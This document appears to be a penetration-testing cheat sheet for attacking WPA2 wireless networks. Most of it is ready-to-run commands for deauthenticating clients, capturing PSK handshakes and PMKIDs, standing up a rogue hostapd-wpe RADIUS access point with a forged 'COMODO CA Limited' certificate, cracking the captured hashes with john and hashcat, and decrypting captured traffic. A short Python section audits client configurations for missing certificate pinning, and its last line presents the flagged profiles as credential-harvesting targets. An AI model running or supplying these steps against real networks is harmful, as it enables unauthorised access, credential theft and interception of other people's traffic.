Contents
- Capturing WPA2-PSK Handshakes
- Cracking WPA2-PSK Handshakes
- Capturing WPA2-Managed Handshakes
- Cracking WPA2-Managed Handshakes
- Creating Custom Dictionaries
- Decrypting WPA2 Traffic
- Connecting to Wireless Networks
Useful Links
- https://www.wireshark.org/tools/oui-lookup.html
- https://macvendors.com/
Capturing WPA2-PSK Handshakes
Capturing WPA2-PSK Handshakes and/or PMKID
- Kill interfering processes
airmon-ng check kill
- Note: this stops the network manager and DHCP client, so you may need to start DHCP on eth0 manually if you still need that interface to work
- Put the wireless adaptor into monitor mode
airmon-ng start wlan0
- Look for common channels
airodump-ng wlan0mon -a --essid-regex="^(Target|target-).+"
airodump-ng wlan0mon -a --essid TargetAP -w recon
- Note: 5 GHz cards might also require the --band parameter
- Limit to the common channels and look for the most active
airodump-ng wlan0mon -a --essid TargetAP -c 1,6,11 -w recon
- Limit to the most active channel
airodump-ng wlan0mon -a --essid TargetAP -c 11 -w ch11
- Send deauthentication
aireplay-ng wlan0mon -0 3 -a <Target AP MAC> -c <Client MAC>
Cracking WPA2-PSK Handshakes
Cracking Handshakes/PMKID
- Attempt brute-force password guessing attack
aircrack-ng ch11-01.cap -w dictionary4.txt
(Select the right network, which should have something like "WPA (0 handshake, with PMKID)" beside it.)
- Troubleshooting
Capturing WPA2-Managed Handshakes
- Install hostapd-wpe
apt-get install hostapd-wpe
- Back up everything in
/etc/hostapd-wpe/certs
- Edit ca.cnf and server.cnf to suit (see the modifications below)
- Delete all client cert files if you’re not using them
- Clean up before running bootstrap
rm *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*
- Run
./bootstrap
(ignore errors)
- Change directory to
/etc/hostapd-wpe
- Edit
/etc/hostapd-wpe/hostapd-wpe.conf
- Run
airmon-ng check kill
- Run
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf -d
- Handshakes should log to
/etc/hostapd-wpe/hostapd-wpe.log
Modifications to ca.cnf
(Remove unused lines in the [certificate_authority] section)
[certificate_authority]
countryName = US
organizationName = COMODO CA Limited
commonName = "COMODO CA Limited"
Modifications to server.cnf
(Remove unused lines in the [server] section)
[ policy_match ]
countryName = supplied
stateOrProvinceName = optional
organizationName = supplied
[server]
countryName = AU
stateOrProvinceName = Victoria
localityName = Melbourne
organizationName = "ACME Limited"
organizationalUnitName = IT
commonName = "wireless.acme.internal"
Modifications to hostapd-wpe.conf
ssid=targetap
bssid=c0:ff:ee:c0:ff:ee
channel=36
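The rogue AP above only captures credentials because the client accepts whatever certificate the hostapd-wpe RADIUS server presents, including the forged "COMODO CA Limited" chain built from ca.cnf and server.cnf. As an added example (not part of the original notes, nor hostapd-wpe's or wpa_supplicant's own code), this Python check parses wpa_supplicant network blocks and flags WPA-Enterprise profiles that lack a ca_cert or a server-name match, the two settings that make a client reject such a chain. The embedded config is constructed sample data; the field names are the standard wpa_supplicant ones.

```python
import re

# Constructed sample wpa_supplicant.conf (not from the original notes): the first
# profile accepts any RADIUS certificate, the second pins the CA and server name.
SAMPLE_CONF = """
network={
    ssid="targetap"
    key_mgmt=WPA-EAP
    eap=PEAP
}
network={
    ssid="targetap"
    key_mgmt=WPA-EAP
    eap=PEAP
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="wireless.acme.internal"
}
"""

NETWORK_BLOCK = re.compile(r"network=\{(.*?)\}", re.S)
# Any of these ties the accepted server certificate to a specific name.
SERVER_NAME_KEYS = ("domain_match", "domain_suffix_match", "subject_match", "altsubject_match")


def parse_networks(conf):
    """Return one dict (key -> unquoted value) per network={...} block."""
    networks = []
    for block in NETWORK_BLOCK.findall(conf):
        fields = {}
        for line in block.splitlines():
            line = line.split("#", 1)[0].strip()  # drop comments; assumes no '#' inside quotes
            if "=" in line:
                key, value = line.split("=", 1)
                fields[key.strip()] = value.strip().strip('"')
        networks.append(fields)
    return networks


def audit_eap_profiles(conf):
    """Return (ssid, finding) pairs for 802.1X profiles that would trust a rogue RADIUS server."""
    findings = []
    for net in parse_networks(conf):
        if not any(tag in net.get("key_mgmt", "") for tag in ("EAP", "IEEE8021X")):
            continue  # PSK and open profiles never talk to a RADIUS server
        ssid = net.get("ssid", "<no ssid>")
        if "ca_cert" not in net:
            findings.append((ssid, "no ca_cert: any certificate chain, including a self-signed one, is trusted"))
        if not any(key in net for key in SERVER_NAME_KEYS):
            findings.append((ssid, "no server name match: any certificate issued by the trusted CA is accepted"))
    return findings
```

Running audit_eap_profiles on a client's real configuration lists exactly the profiles that the setup above would harvest credentials from.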
Cracking WPA2-Managed Handshakes
- Copy the username:hash sections from
/etc/hostapd-wpe/hostapd-wpe.log
into another file and run john or hashcat
- john:
cat /etc/hostapd-wpe/hostapd-wpe.log | grep jtr | cut -f 4 | sort -u -t: -k1,1 > /tmp/jtr.txt
john /tmp/jtr.txt --wordlist=/usr/share/wordlists/rockyou.txt
- hashcat:
cat /etc/hostapd-wpe/hostapd-wpe.log | grep hashcat | cut -f 3 | sort -u -t: -k1,1 > /tmp/hcat.txt
hashcat -m 5500 /tmp/hcat.txt /usr/share/wordlists/rockyou.txt
Creating Custom Dictionaries
- Create words.txt containing the base words, e.g.
targetap
- Permute this wordlist with l33tsp34k rules
john --wordlist=words.txt --rules=NT --stdout | sort -u > dictionary1.txt
john --wordlist=dictionary1.txt --rules=l33t --stdout | sort -u > dictionary2.txt
john --wordlist=dictionary2.txt --rules=l33t --stdout | sort -u > dictionary3.txt
john --wordlist=dictionary3.txt --rules=l33t --stdout | sort -u > dictionary4.txt
Decrypting WPA2 Traffic
- Decrypt with
airdecap-ng -e TargetAP -b 18:80:90:6E:E7:A4 -p "APPassword" ch11-05.cap
- Tip: You can leave airodump running to continue capture while you work at decrypting.
- Open with Wireshark
wireshark ch11-05-dec.cap
- Try some basic filters
tcp.port eq 80
tcp.port eq 21
Connecting to Wireless Networks
wpa_passphrase "TargetAP" "12345678" > TargetAP.conf
sudo wpa_supplicant -i wlan0mon -c TargetAP.conf -d
- Run iwconfig to check status
